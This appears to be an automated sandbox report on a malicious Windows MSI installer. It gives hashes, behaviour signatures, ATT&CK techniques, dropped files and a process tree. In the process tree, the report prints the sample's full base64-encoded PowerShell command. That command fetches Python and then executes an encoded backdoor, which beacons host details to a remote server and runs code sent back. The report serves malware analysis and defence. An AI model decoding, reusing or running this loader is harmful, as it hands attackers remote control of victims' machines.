f6b71317e15b0fe5dd80e6dbddf09e7935c270eeb13c2cd90cec12b069359255

Analysis

max time kernel
121s
max time network
123s
platform
windows7_x64
resource
win7-20231201-en
resource tags

arch:x64arch:x86image:win7-20231201-enlocale:en-usos:windows7-x64system
submitted
11-12-2023 07:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

install.msi
Size

1.1MB
MD5

177233c88c71a12b6dd192ad1cda735f
SHA1

fa36613e47fe2bf72657767ba87f9ab6a86bc9ca
SHA256

f6b71317e15b0fe5dd80e6dbddf09e7935c270eeb13c2cd90cec12b069359255
SHA512

003677a6da400545b24518c0a70138a8eae0fbe46e47ebb88b6d016291aeb2703c31fb8a4260d19f02e6029ba9249df6d007c22e54ef3d6bd94267f58c154c7e
SSDEEP

24576:3sIYKztdfG8NQGafAdbe/IEFXsaV5C7eYVLsTPRDKe:3sIYefNQGoAhRaV5C77yPROe

Score

7^/10

Malware Config

Signatures

Loads dropped DLL 4 IoCs

pid	Process
2928	MsiExec.exe
2928	MsiExec.exe
2928	MsiExec.exe
2928	MsiExec.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 10 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\MSI19D9.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI195B.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\f761880.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI1890.tmp	msiexec.exe
File created	C:\Windows\Installer\f761883.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI1B60.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI1B61.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\f761883.ipi	msiexec.exe
File created	C:\Windows\Installer\f761880.msi	msiexec.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2316	msiexec.exe
2316	msiexec.exe
2688	powershell.exe
2328	powershell.exe

Suspicious use of AdjustPrivilegeToken 54 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2168	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2168	msiexec.exe
Token: SeRestorePrivilege	2316	msiexec.exe
Token: SeTakeOwnershipPrivilege	2316	msiexec.exe
Token: SeSecurityPrivilege	2316	msiexec.exe
Token: SeCreateTokenPrivilege	2168	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2168	msiexec.exe
Token: SeLockMemoryPrivilege	2168	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2168	msiexec.exe
Token: SeMachineAccountPrivilege	2168	msiexec.exe
Token: SeTcbPrivilege	2168	msiexec.exe
Token: SeSecurityPrivilege	2168	msiexec.exe
Token: SeTakeOwnershipPrivilege	2168	msiexec.exe
Token: SeLoadDriverPrivilege	2168	msiexec.exe
Token: SeSystemProfilePrivilege	2168	msiexec.exe
Token: SeSystemtimePrivilege	2168	msiexec.exe
Token: SeProfSingleProcessPrivilege	2168	msiexec.exe
Token: SeIncBasePriorityPrivilege	2168	msiexec.exe
Token: SeCreatePagefilePrivilege	2168	msiexec.exe
Token: SeCreatePermanentPrivilege	2168	msiexec.exe
Token: SeBackupPrivilege	2168	msiexec.exe
Token: SeRestorePrivilege	2168	msiexec.exe
Token: SeShutdownPrivilege	2168	msiexec.exe
Token: SeDebugPrivilege	2168	msiexec.exe
Token: SeAuditPrivilege	2168	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2168	msiexec.exe
Token: SeChangeNotifyPrivilege	2168	msiexec.exe
Token: SeRemoteShutdownPrivilege	2168	msiexec.exe
Token: SeUndockPrivilege	2168	msiexec.exe
Token: SeSyncAgentPrivilege	2168	msiexec.exe
Token: SeEnableDelegationPrivilege	2168	msiexec.exe
Token: SeManageVolumePrivilege	2168	msiexec.exe
Token: SeImpersonatePrivilege	2168	msiexec.exe
Token: SeCreateGlobalPrivilege	2168	msiexec.exe
Token: SeRestorePrivilege	2316	msiexec.exe
Token: SeTakeOwnershipPrivilege	2316	msiexec.exe
Token: SeRestorePrivilege	2316	msiexec.exe
Token: SeTakeOwnershipPrivilege	2316	msiexec.exe
Token: SeRestorePrivilege	2316	msiexec.exe
Token: SeTakeOwnershipPrivilege	2316	msiexec.exe
Token: SeRestorePrivilege	2316	msiexec.exe
Token: SeTakeOwnershipPrivilege	2316	msiexec.exe
Token: SeRestorePrivilege	2316	msiexec.exe
Token: SeTakeOwnershipPrivilege	2316	msiexec.exe
Token: SeRestorePrivilege	2316	msiexec.exe
Token: SeTakeOwnershipPrivilege	2316	msiexec.exe
Token: SeRestorePrivilege	2316	msiexec.exe
Token: SeTakeOwnershipPrivilege	2316	msiexec.exe
Token: SeRestorePrivilege	2316	msiexec.exe
Token: SeTakeOwnershipPrivilege	2316	msiexec.exe
Token: SeRestorePrivilege	2316	msiexec.exe
Token: SeTakeOwnershipPrivilege	2316	msiexec.exe
Token: SeDebugPrivilege	2688	powershell.exe
Token: SeDebugPrivilege	2328	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
2168	msiexec.exe
2168	msiexec.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2316 wrote to memory of 2928	2316	msiexec.exe	24
PID 2316 wrote to memory of 2928	2316	msiexec.exe	24
PID 2316 wrote to memory of 2928	2316	msiexec.exe	24
PID 2316 wrote to memory of 2928	2316	msiexec.exe	24
PID 2316 wrote to memory of 2928	2316	msiexec.exe	24
PID 2316 wrote to memory of 2928	2316	msiexec.exe	24
PID 2316 wrote to memory of 2928	2316	msiexec.exe	24
PID 2928 wrote to memory of 2688	2928	MsiExec.exe	31
PID 2928 wrote to memory of 2688	2928	MsiExec.exe	31
PID 2928 wrote to memory of 2688	2928	MsiExec.exe	31
PID 2928 wrote to memory of 2688	2928	MsiExec.exe	31
PID 2688 wrote to memory of 2328	2688	powershell.exe	32
PID 2688 wrote to memory of 2328	2688	powershell.exe	32
PID 2688 wrote to memory of 2328	2688	powershell.exe	32
PID 2688 wrote to memory of 2328	2688	powershell.exe	32

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\install.msi
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2168

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2316
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 159F91DFA8318EDC4DCE52BBDCF5D95C
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2928
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss1B7E.ps1"
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2688
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e CgAjACAAQgBsAG8AYwBrACAAZgBvAHIAIABkAGUAYwBsAGEAcgBpAG4AZwAgAHQAaABlACAAcwBjAHIAaQBwAHQAIABwAGEAcgBhAG0AZQB0AGUAcgBzAC4ACgBQAGEAcgBhAG0AKAApAAoACgBjAGQAIAAkAEUATgBWADoAcAB1AGIAbABpAGMACgAkAEYAbwBsAGQAZQByACAAPQAgACIAJAB7AEUATgBWADoAcAB1AGIAbABpAGMAfQBcAHAAZQBmAGkAbABlAC0AMgAwADIAMwAuADIALgA3ACIACgAkAEYAbwBsAGQAZQByADIAIAA9ACAAIgAkAHsARQBOAFYAOgBwAHUAYgBsAGkAYwB9AFwAcAB5AHQAaABvAG4AIgAKAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAJABGAG8AbABkAGUAcgAyACAALQBQAGEAdABoAFQAeQBwAGUAIABDAG8AbgB0AGEAaQBuAGUAcgApACkAIAB7AAoAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAUgBJACAAaAB0AHQAcABzADoALwAvAGYAaQBsAGUAcwAuAHAAeQB0AGgAbwBuAGgAbwBzAHQAZQBkAC4AbwByAGcALwBwAGEAYwBrAGEAZwBlAHMALwA3ADgALwBjADUALwAzAGIAMwBjADYAMgAyADIAMwBmADcAMgBlADIAMwA2ADAANwAzADcAZgBkADIAYQA1ADcAYwAzADAAZQA1AGIAMgBhAGQAZQBjAGQAOAA1AGUANwAwADIANwA2ADgANwA5ADYAMAA5AGEANwA0ADAAMwAzADMANAAvAHAAZQBmAGkAbABlAC0AMgAwADIAMwAuADIALgA3AC4AdABhAHIALgBnAHoAIAAtAE8AdQB0AEYAaQBsAGUAIABwAGUAZgBpAGwAZQAuAHQAYQByAC4AZwB6AAoAIAAgACAAIAB0AGEAcgAgAC0AeAB2AHoAZgAgAHAAZQBmAGkAbABlAC4AdABhAHIALgBnAHoAOwAKACAAIAAgACAAUgBlAG4AYQBtAGUALQBJAHQAZQBtACAAJABGAG8AbABkAGUAcgAgACIAcAB5AHQAaABvAG4AIgAKACAAIAAgACAASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAFIASQAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHAAeQB0AGgAbwBuAC4AbwByAGcALwBmAHQAcAAvAHAAeQB0AGgAbwBuAC8AMwAuADkALgA2AC8AcAB5AHQAaABvAG4ALQAzAC4AOQAuADYALQBlAG0AYgBlAGQALQB3AGkAbgAzADIALgB6AGkAcAAgAC0ATwB1AHQARgBpAGwAZQAgAHAAeQB0AGgAbwBuAC4AegBpAHAAOwAKACAAIAAgACAARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAAcAB5AHQAaABvAG4ALgB6AGkAcAAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuAFAAYQB0AGgAIABwAHkAdABoAG8AbgA7AAoAfQAKAC4AXABwAHkAdABoAG8AbgBcAHAAeQB0AGgAbwBuAC4AZQB4AGUAIAAtAGMAIAAiACIAIgBpAG0AcABvAHIAdAAgAGIAYQBzAGUANgA0ADsAIABlAHgAZQBjACgAYgBhAHMAZQA2ADQALgBiADYANABkAGUAYwBvAGQAZQAoACcAYgBTAEEAOQBJAEMAYwAwAE0AVABJADAATQBUAGcAMQBOAGoAZwAxAE4AegBBAG4AQwBtAFoAeQBiADIAMABnAGQARwBsAHQAWgBTAEIAcABiAFgAQgB2AGMAbgBRAGcAYwAyAHgAbABaAFgAQQBLAGMAMgB4AGwAWgBYAEEAbwBOAGoAQQBwAEMAbQBsAHQAYwBHADkAeQBkAEMAQgBpAFkAWABOAGwATgBqAFEAZwBZAFgATQBnAFkAZwBwAHAAYgBYAEIAdgBjAG4AUQBnAGMAMgA5AGoAYQAyAFYAMABJAEcARgB6AEkASABOAHoAQwBtAFoAeQBiADIAMABnAGMAbQBGAHUAWgBHADkAdABJAEcAbAB0AGMARwA5AHkAZABDAEIAagBhAEcAOQBwAFkAMgBVAEsAYQBXADEAdwBiADMASgAwAEkASABkAHAAYgBuAEoAbABaAHkAQgBoAGMAeQBCADMAQwBtAFIAbABaAGkAQgB3AEsARwBNAHMASQBHADQAcABPAGcAbwBnAEkAQwBBAGcAYwB6AEkAZwBQAFMAQgAzAEwAawA5AHcAWgBXADUATABaAFgAawBvAGQAeQA1AEkAUwAwAFYAWgBYADAAeABQAFEAMABGAE0AWAAwADEAQgBRADAAaABKAFQAawBVAHMASQBHAE0AcABDAGkAQQBnAEkAQwBCAHkAWgBYAFIAMQBjAG0ANABnAGQAeQA1AFIAZABXAFYAeQBlAFYAWgBoAGIASABWAGwAUgBYAGcAbwBjAHoASQBzAEkARwA0AHAAVwB6AEIAZABDAG4AQgB5AEkARAAwAGcAYwBDAGgAeQBKADAAaABCAFUAawBSAFgAUQBWAEoARgBYAEYAeABFAFIAVgBOAEQAVQBrAGwAUQBWAEUAbABQAFQAbAB4AGMAVQAzAGwAegBkAEcAVgB0AFgARgB4AEQAWgBXADUAMABjAG0ARgBzAFUASABKAHYAWQAyAFYAegBjADIAOQB5AFgARgB3AHcASgB5AHcAZwBKADEAQgB5AGIAMgBOAGwAYwAzAE4AdgBjAGsANQBoAGIAVwBWAFQAZABIAEoAcABiAG0AYwBuAEsAUQBwADIAYwB5AEEAOQBJAEgAQQBvAGMAaQBkAFQAVAAwAFoAVQBWADAARgBTAFIAVgB4AGMAVABXAGwAagBjAG0AOQB6AGIAMgBaADAAWABGAHgAWABhAFcANQBrAGIAMwBkAHoASQBFADUAVQBYAEYAeABEAGQAWABKAHkAWgBXADUAMABWAG0AVgB5AGMAMgBsAHYAYgBpAGMAcwBJAEMAZABRAGMAbQA5AGsAZABXAE4AMABUAG0ARgB0AFoAUwBjAHAAQwBtAFoAegBJAEQAMABnAEoAeQA1AGkAYwBtAEYANgBhAFcAeAB6AGIAMwBWADAAYQBDADUAagBiAEcAOQAxAFoARwBGAHcAYwBDADUAaABlAG4AVgB5AFoAUwA1AGoAYgAyADAAbgBDAG0AeABzAEkARAAwAGcAVwAyAFkAbgBhADIAWQAwAFoAbQBvADUATQBuAHAAbQBhADIAbwA1AE0AbgB0AG0AYwAzADAAbgBMAEMAQgBtAEoAMgBaAHIAYQBqAGsANQBNADMAbABtAE0AegBrAHoATQAzAHQAbQBjADMAMABuAEwAQwBCAG0ASgAyAGQAbgBOAEQAawA0AGEAbQBoAG8ATQBuAGcANQBOAEQATQAwAGUAMgBaAHoAZgBTAGMAcwBJAEcAWQBuAGEARwBnADEATwBEAE0ANQBNAEQAQQAwAGEAbQBoADcAWgBuAE4AOQBKAHkAdwBnAFoAaQBkAHAAWQBuAE0AeABNAFgAaAByAFoARABnADUATgBEAE4ANwBaAG4ATgA5AEoAeQB3AGcAWgBpAGQAegBhADIAWgBxAE0AagBSADEAZABUAEkANQBaAG0AUgByAGEAagBSAHIAYQBuAHQAbQBjADMAMABuAFgAUQBwAGwAWgBTAEEAOQBJAEUAWgBoAGIASABOAGwAQwBuAGQAbwBhAFcAeABsAEkARgBSAHkAZABXAFUANgBDAGkAQQBnAEkAQwBCAHAAWgBpAEEAbgBRAG4ASgB2AFkAVwBSADMAWgBXAHgAcwBKAHkAQgBwAGIAaQBCAHcAYwBqAG8ASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAaQBjAG0AVgBoAGEAdwBvAGcASQBDAEEAZwBaAG0AOQB5AEkARwB3AGcAYQBXADQAZwBiAEcAdwA2AEMAaQBBAGcASQBDAEEAZwBJAEMAQQBnAGQASABKADUATwBnAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQgAzAGEAWABSAG8ASQBIAE4AegBMAG4ATgB2AFkAMgB0AGwAZABDAGgAegBjAHkANQBCAFIAbAA5AEoAVABrAFYAVQBMAEMAQgB6AGMAeQA1AFQAVAAwAE4ATABYADEATgBVAFUAawBWAEIAVABTAGsAZwBZAFgATQBnAGMAegBvAEsASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkASABNAHUAWQAyADkAdQBiAG0AVgBqAGQAQwBnAG8AWgBpAGQANwBiAEgAMABuAEwAQwBCAGoAYQBHADkAcABZADIAVQBvAFcAegBNADQATQBqAEUAcwBJAEQAUQAwAE0AVABnAHMASQBEAFUAeABOAHoAZwBzAEkARABrADUATwBEAE0AcwBJAEQAYwB6AE0AVABFAHMASQBEAGcAeQBPAFQAUQBzAEkARABZAHkATgB6AE0AcwBJAEQASQB4AE0AVABrAHMASQBEAEUAdwBNAFQAZwBzAEkARABFADMATQBEAEYAZABLAFMAawBwAEMAaQBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB6AEwAbgBOAGwAYgBtAFEAbwBaAGkAZAB3AGUAVQBOAHYAWgBHAFUAZwBMAFMAQgA3AGMAMwBNAHUAWgAyAFYAMABhAEcAOQB6AGQARwA1AGgAYgBXAFUAbwBLAFgAMABnAGYAQwBCADcAZABuAE4AOQBJAEgAdwBnAGUAMwBCAHkAZgBTAGMAdQBaAFcANQBqAGIAMgBSAGwASwBDAGsAcABDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAawBkAEMAQQA5AEkASABNAHUAYwBtAFYAagBkAGkAZwAyAE4AVABVAHoATgBpAGsAdQBaAEcAVgBqAGIAMgBSAGwASwBDAGsASwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBHAFYANABaAFcATQBvAFkAaQA1AGkATgBqAFIAawBaAFcATgB2AFoARwBVAG8AYwAzAFIAeQBLAEcAUgAwAEsAUwBrAHAAQwBpAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBCAHoATABtAE4AcwBiADMATgBsAEsAQwBrAEsASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkARwBWAGwASQBEADAAZwBWAEgASgAxAFoAUQBvAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAFkAbgBKAGwAWQBXAHMASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAbABlAEcATgBsAGMASABRADYAQwBpAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEgAQgBoAGMAMwBNAEsASQBDAEEAZwBJAEcAeABzAEwAbQBGAHcAYwBHAFYAdQBaAEMAZwBuAFkAMgBGAHQAWgBYAEoAaABMAFcAVgB0AGMASABKAGwAYwAyAEUAdQBZAFcATgBqAFoAWABOAHoAWQAyAEYAdABMAG0AOQB5AFoAeQBjAHAAQwBpAEEAZwBJAEMAQgBwAFoAaQBCAGwAWgBUAG8ASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAaQBjAG0AVgBoAGEAdwA9AD0AJwApACkAOwAgAGUAeABpAHQAKAApACIAIgAiADsACgA=
      4⤵
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2328

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\f761884.rbs

Filesize
989B

MD5
aeb4d442e839bb49a4d7b32d4c6949fa

SHA1
58708d5097e723efc46ef015066c2293b7ca78fd

SHA256
467241060a89c729d472097d240ac629aeb58b2e55d98bb9ca0f4bf32119ea78

SHA512
7a045343f1e4746d4e2318b29668a19f19d62b77e37511437a74b05eda208c7db54af8391b1637d4af79b800f47fafad07954ed93af0d0d942ea92a06b0a7b7d

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSI61822.LOG

Filesize
20KB

MD5
420d71a65a8abd19910c6d18a4080f46

SHA1
585562cb3a6e5b2e831b3322603cf0873c08ab49

SHA256
69f63670e1f444f858a441279b74be71907e2eef1b82d0e8871a221acacd5ea1

SHA512
a6abd3328143de5cad469dcc3633a6be87825d1b0528371b86681b8268f003556d6530c3f553dda131bc1b6f3bd202632fa3c41db16c4cc79d708a5f46dfc717

Download Submit
C:\Users\Admin\AppData\Local\Temp\pss1B7D.ps1

Filesize
11KB

MD5
0b28a7441b8d4ff633cbc895a36e6158

SHA1
a4a74d76008bbb40b69fead1a63f9a5b3cd20c4e

SHA256
48722fa5b4613e2f7a0c9535c9d1401cdfde731bb51c78219a199600aa2f0a3c

SHA512
064247d610b3a3f76b9b821ce79a74533154fbc717c0e3473f598863bd9358404d983a22fd4a2131022fb0f86da588704cafece1969867407ad59771823a6a1c

Download Submit
C:\Users\Admin\AppData\Local\Temp\pss1B7E.ps1

Filesize
5KB

MD5
c83ee8ce0932bd0fb926f47b703e25ce

SHA1
b1d52cc93cf35f8a19b6bdf57a13039ed6cb00ec

SHA256
0e0ab6f67f63aeced2a2306133e41dd9d63a62e3980172afb6155adfc32c276a

SHA512
1ef9da2a67b47f45c1646a2282eb6e475ebf377f72d1b3a96bde7cc2a31d7660b36e146186e15a64dfd5ce5e971dc559ff10412434a91c61633d3b3dcd862b13

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IKFRU18ZKQZ94XIMA0AM.temp

Filesize
7KB

MD5
1b3d250bd006da63fa5153ed028aa375

SHA1
5788ffe51edf18d5581eba493b4fba61e99a21cd

SHA256
3390123c253818fde8c11aff98c3e1465c789c5fdbe76d07ca74e0a5f47588f9

SHA512
b7079886eacbc40aa780e6fe6a9d81623b325e467cb3a425dac095c88ba059adbf8aa1c88755152219ee84e41626dd067115afe840b147c3ece017741c9ea17a

Download Submit
C:\Windows\Installer\MSI1890.tmp

Filesize
22KB

MD5
6b8296eb452748f021fc6edd4bf2c3f0

SHA1
89c0ba1bf528deaecedda9e8ad264989f37bc5bf

SHA256
809670380be9b0e5d1b4114696c5f4e3751c257813853bc4822be6b10c1c2d02

SHA512
134377452622af37b0ce230be572c950519b320cb412aa2db2ce0aee0d269d3dda60876a39f2843fb8670953fb92cd903aa4eed505c100b779cd45d8022358c2

Download Submit
C:\Windows\Installer\MSI195B.tmp

Filesize
364KB

MD5
ca95f207ec70ba34b46c785f7bcb5570

SHA1
25c0d45cb9f94892e2877033d06fe8909e5b9972

SHA256
8ac4b42fb36d10194a14c32f6f499a6ac6acb79adbec858647495ba64f6dd2bb

SHA512
c7003a2159f5adab0a3b4a4f3c0dd494d916062a57e84a23ccc18410fa394438d49208769027c641569b3025616e99ca1730a540846aaf1c5d91338b90008831

Download Submit
C:\Windows\Installer\MSI19D9.tmp

Filesize
334KB

MD5
0295c33735529b3637148b9819182692

SHA1
b7767328f6c2a8aa51f5514b33d0d190ff0e4fc5

SHA256
fdd3c7a61d5b857107b760d266b3a5f43893ef620ea40b712501931ab1f9417d

SHA512
405bc49560503b24282995ec359746e1a408943a44307a1fc95766a3611ed245a351715442e9be5f9108bfb3002bfbf07670c8a0caa642a0fd92e2886fad0571

Download Submit
C:\Windows\Installer\MSI1B61.tmp

Filesize
172KB

MD5
a94b16dc472f29a6ab1569603293af7c

SHA1
4053aab40840f377dcd31cf6b2eb3f1f33691889

SHA256
d4ed6c51fd685c57b0917da0ff86ebee8a6ca2eef67c24507de44f937f295631

SHA512
96d5e5b5127a11c1504586c0c94f2af1d1b0557ab7e48daab928dab7c0d1ef314999605afa7370582f050cdaa7828f23116aebabe8160e8b6c5b26119265ad7f

Download Submit
\Windows\Installer\MSI1890.tmp

Filesize
14KB

MD5
47e9ae60de6face0a0919b7ca3d13c53

SHA1
cdb41fcb8a1fc7ed38987ef303d75abe52a757ae

SHA256
33a3005ee8ac8563e94a693c564038fff2a0781a52506bc795bad94d42a5cd94

SHA512
d763f1ac1e9c19abdf3b595c95d46b601b2edbf8728360f3224505c4b7239d989749f35ace7c42ae5dadc5893fc1f2d76c3aa3912d8630d10b045ede07b1aaf1

Download Submit
\Windows\Installer\MSI195B.tmp

Filesize
274KB

MD5
82f9b99f9c032070af77916827869368

SHA1
adf075357a3ed40a5670223fd0e8d0c86f041f1c

SHA256
23b4d6bdddf13a48ce6feb836631aa255dd4e136a111a53adfb3f17ba57781db

SHA512
d36375c2221f9de540f9ee478ab7e908f5704798dab680570139d81e36da06dd98e026cdd73273ed9074211c4975066a9cbe0e441065d16b6ce94a269dc3b3d7

Download Submit
\Windows\Installer\MSI1B61.tmp

Filesize
224KB

MD5
d5cd17dd4b1ad460e4005183207fc6db

SHA1
16472d63e5aff7e43935513de5c491b3e68a7aa5

SHA256
853373ebb0ddafcdaa0215de767f9f0098ec8d6e196db77c605c79af72b99ef5

SHA512
576bb426d6c42f44a945c99be5b78d950869aa824debd55ff3293dc3c106cb6e11c6309a00d3c12be855862c6723e7ba7356a8b6541202da48640d625bc076ec

Download Submit
memory/2328-46-0x0000000002AD0000-0x0000000002B10000-memory.dmp

Filesize
256KB

Download
memory/2328-43-0x0000000073BE0000-0x000000007418B000-memory.dmp

Filesize
5.7MB

Download
memory/2328-45-0x0000000002AD0000-0x0000000002B10000-memory.dmp

Filesize
256KB

Download
memory/2328-44-0x0000000073BE0000-0x000000007418B000-memory.dmp

Filesize
5.7MB

Download
memory/2328-47-0x0000000073BE0000-0x000000007418B000-memory.dmp

Filesize
5.7MB

Download
memory/2688-32-0x0000000073BE0000-0x000000007418B000-memory.dmp

Filesize
5.7MB

Download
memory/2688-33-0x0000000002F50000-0x0000000002F90000-memory.dmp

Filesize
256KB

Download
memory/2688-34-0x0000000002F50000-0x0000000002F90000-memory.dmp

Filesize
256KB

Download
memory/2688-35-0x0000000002F50000-0x0000000002F90000-memory.dmp

Filesize
256KB

Download
memory/2688-48-0x0000000073BE0000-0x000000007418B000-memory.dmp

Filesize
5.7MB

Download
memory/2688-31-0x0000000073BE0000-0x000000007418B000-memory.dmp

Filesize
5.7MB

Download